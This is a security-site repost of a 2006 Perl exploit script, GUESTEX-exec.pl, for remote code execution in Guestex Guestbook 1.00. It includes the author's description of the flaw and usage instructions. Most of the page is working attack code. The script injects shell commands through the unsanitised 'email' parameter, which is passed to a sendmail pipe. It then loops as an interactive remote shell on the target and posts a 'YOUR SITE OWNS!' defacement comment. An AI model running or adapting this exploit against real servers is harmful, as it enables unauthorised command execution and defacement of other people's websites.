首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Guestex Guestbook 1.00 (email) Remote Code Execution Exploit
来源:awarenetwork.org 作者:K-sPecial 发布时间:2006-06-09  

## Creator: K-sPecial (xzziroz.net) of .aware (awarenetwork.org)
## Name: GUESTEX-exec.pl
## Date: 06/07/2006
## Version: 1.00
## 1.00 (06/07/2006) - GUESTEX-exec.pl created
##
## Description: GUESTEX guestbook is vulnerable to remote code execution in how it
## handles it's 'email' parameter. $form{'email'} is used when openning a pipe to
## sendmail in this manner: open(MAIL, "$sendmail $form{'email'}) where $form{'email'}
## is not properly sanitized.
##
## Usage: specify the host and location of the script as the first argument. hosts can
## contain ports (host:port) and you CAN specify a single command to execute via the
## commandline, although if you do not you will be given a shell like interface to
## repeatedly enter commands.
#######################################################################################
use IO::Socket;
use strict;

my $host = $ARGV[0];
my $location = $ARGV[1];
my $command = $ARGV[2];
my $sock;
my $port = 80;
my $comment = $ARGV[3] || "YOUR SITE OWNS!\n";

if (!($host && $location)) {
die("-!> perl $0 <host[:port]> <location> [command] [comment]\n");
}

$port = $1 if ($host =~ m/:(\d+)/);

while (1) {
my $switch = 0;
if (!($ARGV[2])) {
print 'guestex-shell$ ';
chomp($command = <STDIN>);
}

my $cmd = ";echo --1337 start-- ;$command; echo --1337 end--";
$cmd =~ s/(.)/sprintf("%%%x", ord($1))/ge;

my $POST = "POST $location HTTP/1.1\r\n" .
"Host: $host\r\n" .
"User-Agent: mozilla\r\n" .
"Content-type: application/x-www-form-urlencoded\r\n" .
"Content-length: " . length("surname=ax0r&nationality=american&country of residence=USA&preview=no&action=add&name=ax0r&site=ax0r net&url=www.ax0r.net&location=atlanta,ga&rating=10&comment=$comment&email=ax0r\@yahoo.com$cmd") . "\r\n" .
"Referer: $host\r\n\r\n";

$POST .= "surname=ax0r&nationality=american&country of residence=USA&preview=no&action=add&name=ax0r&site=ax0r net&url=www.ax0r.net&location=atlanta,ga&rating=10&comment=$comment&email=ax0r\@yahoo.com$cmd";

$sock = IO::Socket::INET->new('PeerAddr' => "$host",
'PeerPort' => $port,
'Proto' => 'tcp',
'Type' => SOCK_STREAM) or die ("-!> unable to connect to '$host:$port': $!\n");

$sock->autoflush();

print $sock "$POST";

#$switch = 1; # used for debugging if you think 'echo' might not be working, etc

while (my $line = <$sock>) {
if ($line =~ m/^\-\-1337\ start\-\-$/) {
$switch = 1;
next;
}
if ($line =~ m/^\-\-1337\ end\-\-$/) {
close($sock);
last;
}
print $line if $switch;
}
exit if $ARGV[2];
}



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·QBik Wingate 6.1.1.1077 (POST)
·SaphpLesson version 2.0 remote
·myNewsletter <= 1.1.2 (admi
·Kerio Personal Firewall Remote
·Linux Kernel < 2.6.16.18 (N
·Microsoft Internet Explorer Is
·Dmx Forum <= 2.1a (edit.php
·Apple Mac OS X /usr/bin/passwd
·Claroline <= 1.7.6 (include
·LibTIFF Library BitsPerSample
·SCart 2.0 (page) Remote Code E
·Microsoft Visual Studio dbp Fi
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved